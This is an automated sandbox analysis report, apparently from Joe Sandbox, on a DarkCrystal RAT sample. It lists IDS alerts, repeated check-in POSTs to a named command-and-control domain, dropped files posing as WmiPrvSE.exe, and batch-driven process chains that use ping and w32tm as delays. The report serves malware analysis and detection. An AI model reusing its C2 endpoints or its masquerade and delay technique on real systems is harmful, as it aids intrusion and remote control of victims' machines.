Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50020 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50011 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50010 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50012 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50016 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50021 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50018 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50022 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50013 -> 188.114.96.3:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 304773cm.n9shteam.inContent-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 304773cm.n9shteam.inContent-Length: 332Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: 304773cm.n9shteam.in

Source: unknown

HTTP traffic detected: POST /jscpuGamegeneratorprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 304773cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: WmiPrvSE.exe, 00000014.00000002.2091819764.000000000389D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://304773cm.n9P
Source: WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003958000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003BBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://304773cm.n9Pb
Source: WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003958000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000389D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003781000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003BBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://304773cm.n9sh
Source: WmiPrvSE.exe, 00000005.00000002.1857861483.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000005.00000002.1857861483.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.000000000340F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003958000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000389D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000335B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001A.00000002.2184474475.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001A.00000002.2184474475.000000000310B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.000000000393A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003781000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2417043578.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2417043578.0000000003A88000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2549744196.0000000003924000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2549744196.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2684878777.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2684878777.0000000003191000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003D7E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.00000000036B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://304773cm.n9shteam.in
Source: WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003BBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://304773cm.n9shteam.in/
Source: WmiPrvSE.exe, 00000005.00000002.1857861483.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.000000000340F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003958000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000389D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001A.00000002.2248061737.000000001B4D0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001A.00000002.2184474475.000000000310B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003781000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2417043578.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2549744196.0000000003924000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2684878777.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.00000000036B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003BBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
Source: WmiPrvSE.exe, 00000014.00000002.2091819764.000000000335B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://304773cm.n9shteam.in/jscpuGamegeneratorprivate.php0
Source: 9D7RwuJrth.exe, 00000000.00000002.1765297804.00000000030D6000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000005.00000002.1857861483.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.000000000340F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.1990818410.0000000003958000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000389D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000014.00000002.2091819764.000000000335B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001A.00000002.2184474475.000000000310B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2318062172.0000000003781000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2417043578.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2549744196.0000000003924000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2684878777.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.00000000036B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2793451795.0000000003BBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Windows\GameBarPresenceWriter\24dbde2999530e	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\WmiApRpl.h
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\WmiApRpl.ini
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\0009\
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\PerfStringBackup.TMP

Source: C:\Windows\System32\wbem\WMIADAP.exe

File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9B880D70	0_2_00007FFD9B880D70
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9BFD3140	0_2_00007FFD9BFD3140
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Code function: 0_2_00007FFD9BFD0B14	0_2_00007FFD9BFD0B14
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 5_2_00007FFD9B8A0D70	5_2_00007FFD9B8A0D70
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 5_2_00007FFD9BFF506F	5_2_00007FFD9BFF506F
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 5_2_00007FFD9BFF0B14	5_2_00007FFD9BFF0B14
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 14_2_00007FFD9BAB0D70	14_2_00007FFD9BAB0D70
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 14_2_00007FFD9C20CD32	14_2_00007FFD9C20CD32
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 14_2_00007FFD9C20BF86	14_2_00007FFD9C20BF86
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 20_2_00007FFD9BAC0D70	20_2_00007FFD9BAC0D70
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 20_2_00007FFD9C21506F	20_2_00007FFD9C21506F
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 20_2_00007FFD9C21CD32	20_2_00007FFD9C21CD32
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 20_2_00007FFD9C21BF86	20_2_00007FFD9C21BF86
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 20_2_00007FFD9C226902	20_2_00007FFD9C226902
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAC0866	26_2_00007FFD9BAC0866
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAE0F31	26_2_00007FFD9BAE0F31
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAEEFC8	26_2_00007FFD9BAEEFC8
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9BAB0D70	26_2_00007FFD9BAB0D70
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 26_2_00007FFD9C200B14	26_2_00007FFD9C200B14
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAD0866	32_2_00007FFD9BAD0866
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAF0F31	32_2_00007FFD9BAF0F31
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAFEFC8	32_2_00007FFD9BAFEFC8
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 32_2_00007FFD9BAC0D70	32_2_00007FFD9BAC0D70
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 32_2_00007FFD9C21CD32	32_2_00007FFD9C21CD32
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 32_2_00007FFD9C21BF86	32_2_00007FFD9C21BF86
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 32_2_00007FFD9C21506F	32_2_00007FFD9C21506F
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 32_2_00007FFD9C22B2E4	32_2_00007FFD9C22B2E4
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Code function: 32_2_00007FFD9C226902	32_2_00007FFD9C226902

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\AEgOhmic.log 80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F

Source: 9D7RwuJrth.exe, 00000000.00000002.1782132391.000000001BACB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Ex vs 9D7RwuJrth.exe
Source: 9D7RwuJrth.exe, 00000000.00000000.1727163824.0000000000412000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9D7RwuJrth.exe
Source: 9D7RwuJrth.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 9D7RwuJrth.exe

Source: 9D7RwuJrth.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 9D7RwuJrth.exe, Kf91xH5eoCMEdE3HBXl.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9D7RwuJrth.exe, Kf91xH5eoCMEdE3HBXl.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9D7RwuJrth.exe, Kf91xH5eoCMEdE3HBXl.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9D7RwuJrth.exe, Kf91xH5eoCMEdE3HBXl.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@90/227@1/1

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

File created: C:\Program Files\Windows Media Player\en-GB\qLBhpsNtheWbwIdhOeZ.exe

Jump to behavior

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

File created: C:\Users\user\Desktop\gxIrOcDq.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-ZEseCL54QGPnsao3t7iD
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2312:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

File created: C:\Users\user\AppData\Local\Temp\rN7wUyQB6L

Jump to behavior

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gA6Kj9AC8z.bat"

Source: 9D7RwuJrth.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9D7RwuJrth.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 9D7RwuJrth.exe	ReversingLabs: Detection: 65%
Source: 9D7RwuJrth.exe	Virustotal: Detection: 73%

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

File read: C:\Users\user\Desktop\9D7RwuJrth.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9D7RwuJrth.exe "C:\Users\user\Desktop\9D7RwuJrth.exe"
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gA6Kj9AC8z.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yRPxJCkWkW.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
